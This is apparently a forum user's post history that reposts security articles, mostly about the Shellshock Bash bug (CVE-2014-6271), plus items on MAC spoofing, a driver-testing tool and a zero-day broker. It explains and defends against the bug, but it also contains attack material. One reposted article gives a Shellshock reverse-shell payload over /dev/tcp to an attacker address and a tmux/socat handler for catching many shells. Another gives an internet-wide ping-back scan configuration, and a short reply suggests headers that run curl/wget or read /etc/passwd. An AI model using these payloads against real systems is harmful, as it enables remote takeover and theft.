Everything posted by Nytro
-
It's never going to work that way. Have you even read a single article about this issue? You know, that "() {" thing?
-
You have 6 detailed articles about this issue here: https://rstforums.com/forum/tutoriale-engleza.rst
-
An HTTP request with the User-Agent/Cookie/Referer header set to a function that runs ping/curl/wget, for example. Or cat /etc/passwd. Or prints something, anything.
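For illustration, a minimal Python sketch of such a probe request — the endpoint URL is a placeholder and the payload only echoes a harmless marker; this builds the request without sending it:

```python
from urllib.request import Request

# The Shellshock trigger: a function definition followed by a trailing command.
payload = '() { :; }; echo VULNERABLE'

# Hypothetical CGI endpoint; a vulnerable server would execute the trailing
# command when the header lands in its environment.
req = Request(
    "http://example.com/cgi-bin/test.sh",
    headers={
        "User-Agent": payload,
        "Cookie": payload,
        "Referer": payload,
    },
)

# urllib normalizes header names via str.capitalize(), hence "User-agent".
print(req.get_header("User-agent"))
```

On a vulnerable target, the marker string (or the side effect of whatever command replaces the echo) shows up in the response or in out-of-band traffic, which is exactly what the ping payloads below demonstrate.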
-
Kartoffel is an extensible command-line tool developed to help developers test the security and reliability of a driver. Kartoffel exposes most of its features via the static library kartolib, so you can build your own K-plugins to test exploits or PoCs, simulate I/O requests, or develop stand-alone programs.

Source: Kartoffel - Secure Your Driver
-
-
SpoofMAC - Spoof your MAC address

For OS X, Windows, and Linux (most flavors). I made this because changing your MAC address in Mac OS X is harder than it should be. The biggest annoyance is that the Wi-Fi card (Airport) needs to be manually disassociated from any connected networks in order for the change to be applied correctly. Doing this manually every time is tedious and lame. Instead of doing that, just run this Python script and change your MAC address in one command. Now for Windows and Linux, too!

Installation

You can install from PyPI using pip or easy_install:

pip install SpoofMAC
easy_install SpoofMAC

or clone/download the repository and install with setup.py. Ex:

git clone git://github.com/feross/SpoofMAC.git
cd SpoofMAC
python setup.py install

If you're not using the system Python (because you use Homebrew, for example), make sure you add '/usr/local/share/python/' (or equivalent) to your path. Or, consider using spoof, a node.js port of this package.

Source: https://github.com/feross/SpoofMAC
-
Kevin Mitnick, Once the World's Most Wanted Hacker, Is Now Selling Zero-Day Exploits

By Andy Greenberg, 09.24.14, 11:41 am

Mitnick showing a keylogging device to a crowd in 2010. Credit: Eneas De Troya | CC BY

As a young man, Kevin Mitnick became the world's most notorious black hat hacker, breaking into the networks of companies like IBM, Nokia, Motorola, and other targets. After a stint in prison, he reinvented himself as a white hat hacker, selling his skills as a penetration tester and security consultant. With his latest business venture, Mitnick has switched hats again: This time to an ambiguous shade of gray.

Late last week, Mitnick revealed a new branch of his security consultancy business he calls Mitnick's Absolute Zero Day Exploit Exchange. Since its quiet inception six months ago, he says the service has offered to sell corporate and government clients high-end "zero-day" exploits, hacking tools that take advantage of secret bugs in software for which no patch yet exists. Mitnick says he's offering exploits developed both by his own in-house researchers and by outside hackers, guaranteed to be exclusive and priced at no less than $100,000 each, including his own fee.

And what will his clients do with those exploits? "When we have a client that wants a zero-day vulnerability for whatever reason, we don't ask, and in fact they wouldn't tell us," Mitnick tells WIRED in an interview. "Researchers find them, they sell them to us for X, we sell them to clients for Y and make the margin in between." Mitnick declined to name any of his customers, and wouldn't say how many, if any, exploits his exchange has brokered so far.
But the website he launched to reveal the project last week offers to use his company's "unique positioning among security researchers and the hacker community" to connect exploit developers with "discerning government and corporate buyers."

As the zero day market has come to light over the last several years, freelance hackers' sale of potential surveillance tools to government agencies has become a hotly debated ethical quandary in the security community. The notion of Kevin Mitnick selling those tools could be particularly eyebrow-raising; after all, Mitnick became a symbol of government oppression in the late 1990s, when he spent four and a half years in prison and eight months in solitary confinement before his trial on hacking charges. The outcry generated a miniature industry in "Free Kevin" T-shirts and bumper stickers. Enabling targeted surveillance also clashes with Mitnick's new image as a privacy advocate; his forthcoming book titled "The Art of Invisibility" promises to teach readers "cloaking and countermeasures" against "Big Brother and big data."

He says his intended customers aren't necessarily governments. Instead, he points to penetration testers and antivirus firms as potential exploit buyers, and even suggests that companies might pay him for vulnerabilities in their own products. "I'm not interested in helping government agencies spy on people," he says. "I have a unique history with the government. These are the same people who locked me in solitary because they thought I could whistle nuclear launch codes." Still, the six-figure fees Mitnick names on his site are far more than most buyers would pay for mere defensive purposes. (Though his website names a minimum price of $200,000, Mitnick says that's an error, and that he's willing to deal in exploits worth half that much.)
Companies like Facebook and PayPal generally pay tens of thousands of dollars at most for information about bugs in their products, though Google occasionally pays as much as $150,000 in hacking contest prizes. Mitnick's exploit exchange seems designed to cater particularly to high-end buyers. It lists two options: Absolute X, which lets clients pay for exclusive use of whatever hacking exploits Mitnick's researchers dig up, and Absolute Z, a more premium service that seeks to find new zero-days that target whatever software the client chooses. "We have some clients that give us a menu of what they're looking for, like 'We're looking for an exploit in this version of Chrome,'" he says. "It's like an Amazon wish list of exploits."

Mitnick is far from the only hacker to see an opportunity in the growing grey market for zero days. Other firms like Vupen, Netragard, Exodus Intelligence, and Endgame Systems have all sold or brokered secret hacking techniques. While the trade is legal, critics have argued that the services' lax customer policies make it possible for repressive regimes or even criminals to gain access to dangerous hacking tools. But Mitnick counters that he'll carefully screen his buyers. "I wouldn't consider in a million years selling to a government like Syria or to a criminal organization," he says. "Customers want to buy this information, and they'll pay a certain price. If they pass our screening process, we'll work with them."

As an ex-convict, Mitnick's entrance into the zero-day market may mean he'll face extra scrutiny himself. From his teens to his early 30s, after all, Mitnick went on an epic intrusion spree through the networks of practically every major tech firm of the day, including Digital Equipment, Sun Microsystems, Silicon Graphics, and many more. For two and a half years, he led the FBI on a manhunt that made him the most wanted hacker in the world at the time of his arrest in 1995.
ACLU technologist Chris Soghoian, a vocal critic of the zero-day exploit business, used that criminal past to take a jab at Mitnick on Twitter following his announcement of the bug-selling brokerage. Mitnick shot back: "My clients may use them to monitor your activities? How do you like them apples, Chris?"

Source: Kevin Mitnick, Once the World's Most Wanted Hacker, Is Now Selling Zero-Day Exploits | WIRED
-
Thursday, September 25, 2014

Remember Heartbleed? If you believe the hype today, Shellshock is in that league and with an equally awesome name, albeit bereft of a cool logo (someone in the marketing department of these vulns needs to get on that). But in all seriousness, it does have the potential to be a biggie and as I did with Heartbleed, I wanted to put together something definitive both for me to get to grips with the situation and for others to dissect the hype from the true underlying risk.

To set the scene, let me share some content from Robert Graham's blog post who has been doing some excellent analysis on this. Imagine an HTTP request like this:

target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (Errata Security: Bash 'shellshock' scan of the Internet)
http-header = Cookie:() { :; }; ping -c 3 209.126.230.74
http-header = Host:() { :; }; ping -c 3 209.126.230.74
http-header = Referer:() { :; }; ping -c 3 209.126.230.74

Which, when issued against a range of vulnerable IP addresses, results in this:

Put succinctly, Robert has just orchestrated a bunch of external machines to ping him simply by issuing a carefully crafted request over the web. What's really worrying is that he has effectively caused these machines to issue an arbitrary command (albeit a rather benign ping) and that opens up a whole world of very serious possibilities. Let me explain.

What is Bash and why do we need it?

Skip this if it's old news, but context is important for those unfamiliar with Bash so let's establish a baseline understanding. Bash is a *nix shell or in other words, an interpreter that allows you to orchestrate commands on Unix and Linux systems, typically by connecting over SSH or Telnet. It can also operate as a parser for CGI scripts on a web server such as we'd typically see running on Apache.
It's been around since the late 80s where it evolved from earlier shell implementations (the name is derived from the Bourne shell) and is enormously popular. There are other shells out there for Unix variants, the thing about Bash though is that it's the default shell for Linux and Mac OS X which are obviously extremely prevalent operating systems. That's a major factor in why this risk is so significant – the ubiquity of Bash – and it's being described as "one of the most installed utilities on any Linux system".

You can get a sense of the Bash footprint when you look at the latest Netcraft web server stats:

When half the net is running Apache (which is typically found on Linux), that's a significant slice of a very, very large pie. That same Netcraft article is reporting that we've just passed the one billion websites mark too and whilst a heap of those are sharing the same hosts, that's still a whole lot of Bash installations. Oh – that's just web servers too, don't forget there are a heap of other servers running Linux and we'll come back to other devices with Bash a bit later too.

Bash can be used for a whole range of typical administrative functions, everything from configuring websites through to controlling embedded software on a device like a webcam. Naturally this is not functionality that's intended to be open to the world and in theory, we're talking about authenticated users executing commands they've been authorised to run. In theory.

What's the bug?
Let me start with the CVE from the NIST vulnerability database because it gives a good sense of the severity (highlight mine):

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.

They go on to rate it a "10 out of 10" for severity or in other words, as bad as it gets. This is compounded by the fact that it's easy to execute the attack (access complexity is low) and perhaps most significantly, there is no authentication required when exploiting Bash via CGI scripts.

The summary above is a little convoluted though so let's boil it down to the mechanics of the bug. The risk centres around the ability to arbitrarily define environment variables within a Bash shell which specify a function definition. The trouble begins when Bash continues to process shell commands after the function definition, resulting in what we'd classify as a "code injection attack". Let's look at Robert's example again and we'll just take this line:

http-header = Cookie:() { :; }; ping -c 3 209.126.230.74

The function definition is () { :; }; and the shell command is the ping statement and subsequent parameters. When this is processed within the context of a Bash shell, the arbitrary command is executed. In a web context, this would mean via a mechanism such as a CGI script and not necessarily as a request header either. It's worth having a read through the seclists.org advisory where they go into more detail, including stating that the path and query string could be potential vectors for the attack.
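As a hedged sketch of that CGI delivery path (the header value and script command here are illustrative, and running it assumes bash is installed): a gateway like mod_cgi copies the Cookie header into the HTTP_COOKIE environment variable, and any Bash child process inherits it:

```python
import subprocess

# Illustrative payload: a function definition plus a trailing command.
cookie_header = '() { :; }; echo injected'

# What a CGI gateway effectively does before invoking a script:
# request headers become environment variables (Cookie -> HTTP_COOKIE).
env = {"PATH": "/usr/bin:/bin", "HTTP_COOKIE": cookie_header}

# The script's shell inherits that environment. A patched bash treats
# HTTP_COOKIE as an inert string; a vulnerable one would have executed
# the trailing `echo injected` as soon as it started.
result = subprocess.run(
    ["bash", "-c", "echo script output"],
    env=env, capture_output=True, text=True,
)
print(result.stdout, end="")
```

On a vulnerable bash the output would begin with "injected" before the script's own output, which is the entire privilege-boundary problem the CVE describes: the attacker never authenticates, they just set an environment variable.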
Of course one means of mitigating this particular attack vector is simply to disable any CGI functionality that makes calls to a shell and indeed some are recommending this. In many cases though, that's going to be a seriously breaking change and at the very least, one that's going to require some extensive testing to ensure it doesn't cause immediate problems in the website which in many cases, it will.

The HTTP proof above is a simple but effective one, albeit just one implementation over a common protocol. Once you start throwing in Telnet and SSH and apparently even DHCP, the scope increases dramatically so by no means are we just talking about exploiting web app servers here. (Apparently the risk is only present in SSH post-auth, but at such an early stage of the public disclosure we'll inevitably see other attack vectors emerge yet.)

What you also need to remember is that the scope of potential damage stretches well beyond pinging an arbitrary address as in Robert's example, that's simply a neat little proof that he could orchestrate a machine to issue a shell command. The question becomes this: What damage could an attacker do when they can execute a shell command of their choosing on any vulnerable machine?

What are the potential ramifications?

The potential is enormous – "getting shell" on a box has always been a major win for an attacker because of the control it offers them over the target environment. Access to internal data, reconfiguration of environments, publication of their own malicious code etc. It's almost limitless and it's also readily automatable. There are many, many examples of exploits out there already that could easily be fired off against a large volume of machines.

Unfortunately when it comes to arbitrary code execution in a shell on up to half the websites on the internet, the potential is pretty broad. One of the obvious (and particularly nasty) ones is dumping internal files for public retrieval.
Password files and configuration files with credentials are the obvious ones, but this could conceivably extend to any other files on the system. Likewise, the same approach could be applied to write files to the system. This is potentially the easiest website defacement vector we've ever seen, not to mention a very easy way of distributing malware.

Or how about this: one word I keep seeing a lot is "worm":

When we talk about a worm in a malicious computing context, we're talking about a self-replicating attack where a malicious actor creates code that is able to propagate across targets. For example, we saw a very effective implementation of this with Samy's MySpace XSS Worm where some carefully crafted JavaScript managed to "infect" a million victims' pages in less than a day.

The worry with Shellshock is that an attack of this nature could replicate at an alarming rate, particularly early on while the majority of machines remain at risk. In theory, this could take the form of an infected machine scanning for other targets and propagating the attack to them. This would be by no means limited to public facing machines either; get this behind the corporate firewall and the sky's the limit. People are working on exploiting this right now. This is what makes these early days so interesting as the arms race between those scrambling to patch and those scrambling to attack heats up.

Which versions of Bash are affected?

The headlines state everything through 4.3 or in other words, about 25 years' worth of Bash versions. Given everyone keeps comparing this to Heartbleed, consider that the impacted versions of OpenSSL spanned a mere two years which is a drop in the ocean compared to Shellshock. Yes people upgrade their versions, but no they don't do it consistently and whichever way you cut it, the breadth of at-risk machines is going to be significantly higher with Shellshock than what it was with Heartbleed. But the risk may well extend beyond 4.3 as well.
Already we're seeing reports of patches not being entirely effective and given the speed with which they're being rolled out, that's not all that surprising. This is the sort of thing those impacted by it want to keep a very close eye on, not just "patch and forget".

When did we first learn of it and how long have we been at risk?

The first mention I've found on the public airwaves was this very brief summary on seclists.org which works out at about 18:00 GMT on Wednesday (about 2am today for those of us on the eastern end of Australia). The detail came in the advisory I mentioned earlier an hour later so getting towards late afternoon Wednesday in Europe or the middle of the day in the US. It's still very fresh news with all the usual press speculation and Chicken Little predictions; it's too early to observe any widespread exploitation in the wild, but that could also come very soon if the risk lives up to its potential.

Scroll back beyond just what has been disclosed publicly and the bug was apparently discovered last week by Stéphane Chazelas, a "Unix/Linux, network and telecom specialist" bloke in the UK. Having said that, in Akamai's post on the bug, they talk about it having been present for "an extended period of time" and of course vulnerable versions of Bash go back two and a half decades now. The question, as with Heartbleed, will be whether or not malicious actors were aware of this before now and indeed whether they were actively exploiting it.

Are our "things" affected?

This is where it gets interesting – we have a lot of "things" potentially running Bash. Of course when I use this term I'm referring to the "Internet of Things" (IoT) which is the increasing prevalence of whacking an IP address and a wireless adaptor into everything from our cutlery to our door locks to our light globes. Many IoT devices run embedded Linux distributions with Bash.
These very same devices have already been shown to demonstrate serious security vulnerabilities in other areas, for example LIFX light globes just a couple of months ago were found to be leaking wifi credentials. Whilst not a Bash vulnerability like Shellshock, it shows us that by connecting our things we're entering a whole new world of vulnerabilities in places that were never at risk before.

This brings with it many new challenges; for example, who is actively thinking they should regularly patch their light bulbs? Also consider the longevity of the devices this software is appearing in and whether they're actually actively maintained. In a case like the vulnerable Trendnet cameras from a couple of years ago, there are undoubtedly a huge number of them still sitting on the web because in terms of patching, they're pretty much a "set and forget" proposition. In fact in that case there's an entire Twitter account dedicated to broadcasting the images it has captured of unsuspecting owners of vulnerable versions. It's a big problem with no easy fixes and it's going to stick with us for a very long time.

But Bash shells are also present in many more common devices, for example our home routers which are generally internet-facing. Remember when you last patched the firmware on your router? Ok, if you're reading this then maybe you're the type of technical person who actually does patch their router, but put yourself in the shoes of Average Joe Consumer and ask yourself that again. Exactly.

All our things are on the Microsoft stack, are we at risk?

Short answer "no", long answer "yes". I'll tackle the easy one first – Bash is not found natively on Windows and whilst there are Bash implementations for Windows, it's certainly not common and it's not going to be found on consumer PCs. It's also not clear if products like win-bash are actually vulnerable to Shellshock in the first place.
The longer answer is that just because you operate in a predominantly Microsoft-centric environment doesn't mean that you don't have Bash running on machines servicing other discrete purposes within that environment. When I wrote about Heartbleed, I referenced Nick Craver's post on moving Stack Overflow towards SSL and referred to this diagram of their infrastructure:

There are non-Microsoft components sitting in front of their Microsoft application stack, components that the traffic needs to pass through before it hits the web servers. These are also components that may have elevated privileges behind the firewall – what's the impact if Shellshock is exploited on those? It could be significant and that's the point I'm making here; Shellshock has the potential to impact assets beyond just at-risk Bash implementations when it exists in a broader ecosystem of other machines.

I'm a system admin – what can I do?

Firstly, discovering if you're at risk is trivial as it's such an easily reproducible risk. There's a very simple test The Register suggests which is just running this command within your shell:

env X="() { :;} ; echo busted" /bin/sh -c "echo stuff"

If you get "busted" echoed back out, you've successfully exploited the bug.

Of course the priority here is going to be patching at-risk systems and the patch essentially boils down to ensuring no code can be executed after the end of a Bash function. Linux distros such as Red Hat are releasing guidance on patching the risk so jump on that as a matter of priority. We'll inevitably also see definitions for intrusion detection systems too and certainly there will be common patterns to look for here. That may well prove a good immediate term implementation for many organisations, particularly where there may be onerous testing requirements before rolling out patches to at-risk systems.
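The Register's one-liner above can also be wrapped in a small Python check — a sketch that invokes bash explicitly rather than /bin/sh, so the result doesn't depend on what sh happens to link to:

```python
import subprocess

# Run the probe: env sets X to a function definition with a trailing
# command, then starts a shell that just echoes "stuff".
probe = subprocess.run(
    ["env", "X=() { :;} ; echo busted", "bash", "-c", "echo stuff"],
    capture_output=True, text=True,
)

# A vulnerable bash executes the trailing command and prints "busted"
# before "stuff"; a patched bash prints only "stuff".
print("vulnerable" if "busted" in probe.stdout else "patched")
```

Either way the inner command still runs, so "stuff" always appears in the output; only the presence of "busted" distinguishes a vulnerable shell.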
Qualys is aiming to have a definition to detect the attack pretty quickly and inevitably other IDS providers are working on this around the clock as well. Other more drastic options include replacing Bash with an alternate shell implementation or cordoning off at-risk systems, both of which could have far-reaching ramifications and are unlikely to be decisions taken lightly. But that's probably going to be the nature of this bug for many people – hard decisions that could have tangible business impact in order to avoid potentially much more significant ramifications.

The other issue which will now start to come up a lot is the question of whether Shellshock has already been exploited in an environment. This can be hard to determine if there's no logging of the attack vectors (there often won't be if it's passed by HTTP request header or POST body), but it's more likely to be caught than with Heartbleed when short of full-on pcaps, the heartbeat payloads would not normally have been logged anywhere. But still, the most common response to "were we attacked via Shellshock" is going to be this:

unfortunately, this isn't "No, we have evidence that there were no compromises;" rather, "we don't have evidence that spans the lifetime of this vulnerability." We doubt many people do - and this leaves system owners in the uncomfortable position of not knowing what, if any, compromises might have happened.

Let the speculation about whether the NSA was in on this begin…

I'm a consumer – what can I do?

It depends. Shellshock affects Macs so if you're running OS X, at this stage that appears to be at risk which on the one hand is bad due to the prevalence of OS X but on the other hand will be easily (and hopefully quickly) remediated due to a pretty well-proven update mechanism (i.e. Apple can remotely push updates to the machine).
If you're on a Mac, the risk is easily tested for as described in this Stack Exchange answer:

It's an easy test, although I doubt the average Mac user is going to feel comfortable stepping through the suggested fix which involves recompiling Bash. The bigger worry is the devices with no easy patching path, for example your router. Short of checking in with the manufacturer's website for updated firmware, this is going to be a really hard nut to crack. Often routers provided by ISPs are locked down so that consumers aren't randomly changing either config or firmware and there's not always a remote upgrade path they can trigger either. Combine that with the massive array of devices and ages that are out there and this could be particularly tricky. Of course it's also not the sort of thing your average consumer is going to be comfortable doing themselves either.

In short, the advice to consumers is this: watch for security updates, particularly on OS X. Also keep an eye on any advice you may get from your ISP or other providers of devices you have that run embedded software. Do be cautious of emails requesting information or instructing you to run software – events like this are often followed by phishing attacks that capitalise on consumers' fears. Hoaxes presently have people putting their iPhones in the microwave so don't for a moment think that they won't run a random piece of software sent to them via email as a "fix" for Shellshock!

Summary

In all likelihood, we haven't even begun to fathom the breadth of this vulnerability. Of course there are a lot of comparisons being made to Heartbleed and there are a number of things we learned from that exercise. One is that it took a bit of time to sink in as we realised the extent to which we were dependent on OpenSSL. The other is that it had a very long tail – months after it hit there were still hundreds of thousands of known hosts left vulnerable.
But in one way, the Heartbleed comparison isn't fair – this is potentially far worse. Heartbleed allowed remote access to a small amount of data in the memory of affected machines. Shellshock is enabling remote code injection of arbitrary commands pre-auth which is potentially far more dire. In that regard, I have to agree with Robert:

It's very, very early days yet – only half a day since it first hit the airwaves at the time of writing – and I suspect that so far we're only scratching the surface of what is yet to come.

Source: Troy Hunt: Everything you need to know about the Shellshock Bash bug
-
CVE-2014-6271 / Shellshock & How to handle all the shells! ;)
Nytro posted a topic in Securitate web
CVE-2014-6271 / Shellshock & How to handle all the shells!

Posted by Joel Eriksson, 2014-09-25

For the TL;DR generation: If you just want to know how to handle all the shells, search for "handling all the shells" and skip down to that.

CVE-2014-6271, also known as "Shellshock", is quite a neat little vulnerability in Bash. It relies on a feature in Bash that allows child processes to inherit shell functions that were defined in the parent. I have played around with this feature before, many years ago, since it could be abused in another way in cases where SUID programs execute external shell scripts (or use system()/popen(), when /bin/bash is the default system shell) and with certain daemons that support environment variable passing.

When a SUID program is the target, the SUID program must first do something like setuid(geteuid()) for this to be exploitable, since inherited shell functions are not accepted when the UID differs from the EUID. When SUID programs call out to shellscript helpers (that need to be executed with elevated privileges) this is usually done, since most shells automatically drop privileges when starting up.

In those cases, it was possible to trick Bash into executing a malicious shell function even when PATH is set explicitly to a "safe" value, or even when the full path is used for all calls to external programs. This was possible due to Bash happily accepting slashes within shell function names. This example demonstrates this problem, as well as the new (and much more serious) CVE-2014-6271 vulnerability.
je@tiny:~$ cat > bash-is-fun.c
/* CVE-2014-6271 + aliases with slashes PoC - je [at] clevcode [dot] org */

#include <unistd.h>
#include <stdio.h>

int main()
{
    char *envp[] = {
        "PATH=/bin:/usr/bin",
        "/usr/bin/id=() { "
        "echo pwn me twice, shame on me; }; "
        "echo pwn me once, shame on you",
        NULL
    };
    char *argv[] = { "/bin/bash", NULL };
    execve(argv[0], argv, envp);
    perror("execve");
    return 1;
}
^D
je@tiny:~$ gcc -o bash-is-fun bash-is-fun.c
je@tiny:~$ ./bash-is-fun
pwn me once, shame on you
je@tiny:/home/je$ /usr/bin/id
pwn me twice, shame on me

As you can see, the environment variable named "/usr/bin/id" is set to "() { cmd1; }; cmd2". Due to the CVE-2014-6271 vulnerability, any command that is provided as "cmd2" will be immediately executed when Bash starts. Due to the peculiarity I was already familiar with, the "cmd1" part is executed when trying to run id in a "secure" manner by providing the full path.

One of the possibilities that crossed my mind when I got to know about this vulnerability was to exploit this over the web, due to CGI programs using environment variables to pass various information that can be arbitrarily controlled by an attacker. For instance, the user-agent string is normally passed in the HTTP_USER_AGENT environment variable. It turns out I was not alone in thinking about this though, and shortly after information about the "Shellshock" vulnerability was released, Robert Graham at Errata Security started scanning the entire internet for vulnerable web servers. Turns out there are quite a few of them.

The scan is quite limited in the sense that it only discovers cases where the default page (GET /) of the default virtual host is vulnerable, and it only uses the Host-, Referer- and Cookie-headers. Another convenient header to use is the User-Agent one, that is normally passed in the HTTP_USER_AGENT variable.
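Coming back to the PoC: as a hedged sketch, the same slash-named environment variable trick can be reproduced without a compiler (the values are illustrative; on a patched bash both payloads stay inert and only the real command output appears):

```python
import subprocess

# Rebuild the PoC's environment in Python: a variable literally named
# "/usr/bin/id" holding a function definition plus a trailing command.
# POSIX execve accepts any "name=value" environment string, slashes included.
env = {
    "PATH": "/bin:/usr/bin",
    "/usr/bin/id": "() { echo pwn me twice, shame on me; }; "
                   "echo pwn me once, shame on you",
}

# On a vulnerable bash, "pwn me once..." prints at startup (CVE-2014-6271)
# and running /usr/bin/id inside that shell prints "pwn me twice..."
# (the slashes-in-function-names peculiarity). On a patched bash, neither
# payload fires.
result = subprocess.run(
    ["/bin/bash", "-c", "echo shell is up"],
    env=env, capture_output=True, text=True,
)
print(result.stdout, end="")
```

This keeps the two distinct bugs from the C listing visible in one place: the trailing-command injection at startup, and the full-path command shadowing via a function name containing slashes.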
Another way to find lots and lots of potentially vulnerable targets is to do a simple google search for "inurl:cgi-bin filetype:sh" (without the quotes). As you may have realized by now, the impact of this vulnerability is enormous.

So, now to the part of handling all the shells. Let's say you are testing a large subnet (or the entire internet) for this vulnerability, and don't want to settle with a ping -c N ADDR payload, as the one Robert Graham used in his PoC. A simple netcat listener is obviously no good, since that will only be useful to deal with a single reverse shell. My solution gives you as many shells as the amount of windows tmux can handle (a lot).

Let's assume you want a full reverse-shell payload, and let's also assume that you want a full shell with job control and a pty instead of the less convenient one you usually get under these circumstances. Assuming a Python interpreter is installed on the target, which is usually a pretty safe bet nowadays, I would suggest you use a payload such as this (with ADDR and PORT replaced with your IP and port number, of course):

() { :; }; bash -c 'python -c "import pty; pty.spawn(\"/bin/bash\")" <> /dev/tcp/ADDR/PORT >&0 2>&0'

To try this out, just run this in one shell to start a listener:

stty -echo raw; nc -l 12345; stty sane

Then do this in another shell:

bash -c 'python -c "import pty; pty.spawn(\"/bin/bash\")" <> /dev/tcp/127.0.0.1/12345 >&0 2>&0'

To deal with all the shells coming your way I would suggest you use some tmux+socat magic I came up with when dealing with similar "problems" in the past.
Place the code below in a file named "alltheshells-handler" and make it executable (chmod 700):

#!/bin/sh
tmux has-session -t alltheshells 2>/dev/null \
    || tmux new-session -d -s alltheshells "cat>/dev/null" \; rename-window info
tmux send-keys -t alltheshells:info "$(date '+%Y-%m-%d %H:%M:%S') Received a shell from $SOCAT_PEERADDR" Enter
mkdir /tmp/alltheshells 2>/dev/null
tmux new-window -d -t alltheshells -n "$SOCAT_PEERADDR" \
    "sleep 1; stty -echo raw; socat unix-client:/tmp/alltheshells/$$.sock -; stty sane; echo; echo EOF; read"
socat unix-listen:/tmp/alltheshells/$$.sock -

Execute this command to start the listener handling all your shells (replace PORT with the port number you want to listen on):

socat tcp-l:PORT,reuseaddr,fork exec:./alltheshells-handler

When the shells start popping you can do:

tmux attach -t alltheshells

The tmux session will not be created until at least one reverse shell has arrived, so if you're impatient just connect to the listener manually to get it going. If you want to try this with my personal spiced-up tmux configuration, grab it from the Pastebin link in the original post. Switch between windows (shells) by simply using ALT-n / ALT-p for the next/previous one. Note that I use ALT-e as my meta key instead of CTRL-B, since I use CTRL-B for other purposes. Feel free to change this to whatever you are comfortable with.

Sursa: CVE-2014-6271 / Shellshock & How to handle all the shells! | ClevCode
[h=3]Bash 'shellshock' scan of the Internet[/h]
By Robert Graham

I'm running a scan right now of the Internet to test for the recent bash vulnerability, to see how widespread this is. My scan works by stuffing a bunch of "ping home" commands in various CGI variables. It's coming from IP address 209.126.230.72. The configuration file for masscan looks something like:

target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (Errata Security: Bash 'shellshock' scan of the Internet)
http-header[Cookie] = () { :; }; ping -c 3 209.126.230.74
http-header[Host] = () { :; }; ping -c 3 209.126.230.74
http-header[Referer] = () { :; }; ping -c 3 209.126.230.74

(Actually, these last three options don't quite work due to a bug, so you have to manually add them to the code: https://github.com/robertdavidgraham/masscan/blob/master/src/proto-http.c#L120)

Some earlier results show that this bug is widespread. A discussion of the results is in the next blog post. The upshot is this: while this scan found only a few thousand systems (because it's intentionally limited), it looks like the potential for a worm is high.

Sursa: Errata Security: Bash 'shellshock' scan of the Internet
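The probe this configuration sends can be sketched in Python; this only assembles the request text with the same ping-back payload, it does not perform any scanning:

```python
def shellshock_probe(callback_ip):
    """Build the header set from the masscan config above: each header
    carries a harmless ping-back payload rather than a real exploit."""
    payload = "() { :; }; ping -c 3 " + callback_ip
    return {
        "User-Agent": "shellshock-scan (demo)",
        "Cookie": payload,
        "Host": payload,
        "Referer": payload,
    }

# Render the raw request a scanned host would receive.
headers = shellshock_probe("209.126.230.74")
request = ("GET / HTTP/1.0\r\n"
           + "".join("%s: %s\r\n" % kv for kv in headers.items())
           + "\r\n")
print(request)
```

A vulnerable host that parses any of those headers in bash pings the callback address, which is how the scan detects it without running anything destructive.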
-
We spent a good chunk of the day investigating the now-famous bash bug, so I had no time for too many jokes about it on Twitter - but I wanted to jot down several things that have been getting drowned out in the noise earlier in the day.

Let's start with the nature of the bug. At its core, the problem is caused by an obscure and little-known feature that allows bash programs to export function definitions from a parent shell to children shells, similarly to how you can export normal environmental variables. The functionality in action looks like this:

$ function foo { echo "hi mom"; }
$ export -f foo
$ bash -c 'foo'  # Spawn nested shell, call 'foo'
hi mom

The behavior is implemented as a hack involving specially-formatted environmental variables: in essence, any variable starting with a literal "() {" will be dispatched to the parser just before executing the main program. You can see this in action here:

$ foo='() { echo "hi mom"; }' bash -c 'foo'
hi mom

The concept of giving magical properties to certain values of environmental variables clashes with several ancient customs - most notably, with the tendency for web servers such as Apache to pass client-supplied strings in the environment to any subordinate binaries or scripts. Say, if I request a CGI or PHP script from your server, the env variables $HTTP_COOKIE and $HTTP_USER_AGENT will probably be initialized to the raw values seen in the original request. If the values happen to begin with "() {" and are ever seen by /bin/bash, events may end up taking an unusual turn.

And so, the bug we're dealing with stems from the observation that trying to parse function-like strings received in HTTP_* variables could have some unintended side effects in that shell - namely, it could easily lead to your server executing arbitrary commands trivially supplied in a HTTP header by random people on the Internet.
With that out of the way, it is important to note that today's patch provided by the maintainer of bash does not stop the shell from trying to parse the code within headers that begin with "() {" - it merely tries to get rid of that particular RCE side effect, originally triggered by appending commands past the end of the actual function definition. But even with all the current patches applied, you can still do this:

Cookie: () { echo "Hello world"; }

...and witness a callable function dubbed HTTP_COOKIE() materialize in the context of subshells spawned by Apache; of course, the name will always be prefixed with HTTP_*, so it's unlikely to clash with anything or be called by accident - but intuitively, it's a pretty scary outcome.

In the same vein, doing this will also have an unexpected result:

Cookie: () { oops

If specified on a request to a bash-based CGI script, you will see a scary bash syntax error message in your error log.

All in all, the fix hinges on two risky assumptions:

- That the bash function parser invoked to deal with variable-originating function definitions is robust and does not suffer from the usual range of low-level C string parsing bugs that almost always haunt similar code - a topic that hasn't been studied in much detail until now.
- That the parsing steps are guaranteed to have no global side effects within the child shell. As it happens, this assertion has already been proved wrong by Tavis; the side effect he found probably-maybe isn't devastating in the general use case (at least until the next stroke of brilliance), but it's certainly a good reason for concern.

If I were a betting man, I would not bet on the fix holding up in the long haul. A more reasonable solution would involve temporarily disabling function exports or blacklisting some of the most dangerous variable patterns (e.g., HTTP_*); and later on, perhaps moving to a model where function exports use a distinct namespace while present in the environment.

What else?
Oh, of course: the impact of this bug is an interesting story all in itself. At first sight, the potential for remote exploitation should be limited to CGI scripts that start with #!/bin/bash and to several other programs that explicitly request this particular shell. But there's a catch: on a good majority of modern Linux systems, /bin/sh is actually a symlink to /bin/bash!

This means that web apps written in languages such as PHP, Python, C++, or Java are likely to be vulnerable if they ever use libcalls such as popen() or system(), all of which are backed by calls to /bin/sh -c '...'. There is also some added web-level exposure through #!/bin/sh CGI scripts, <!--#exec cmd="..."> calls in SSI, and possibly more exotic vectors such as mod_ext_filter.

For the same reason, userland DHCP clients that invoke configuration scripts and use variables to pass down config details are at risk when exposed to rogue servers (e.g., on open wifi). Finally, there is some exposure for environments that use restricted SSH shells (possibly including Git) or restricted sudo commands, but the security of such approaches is typically fairly modest to begin with.

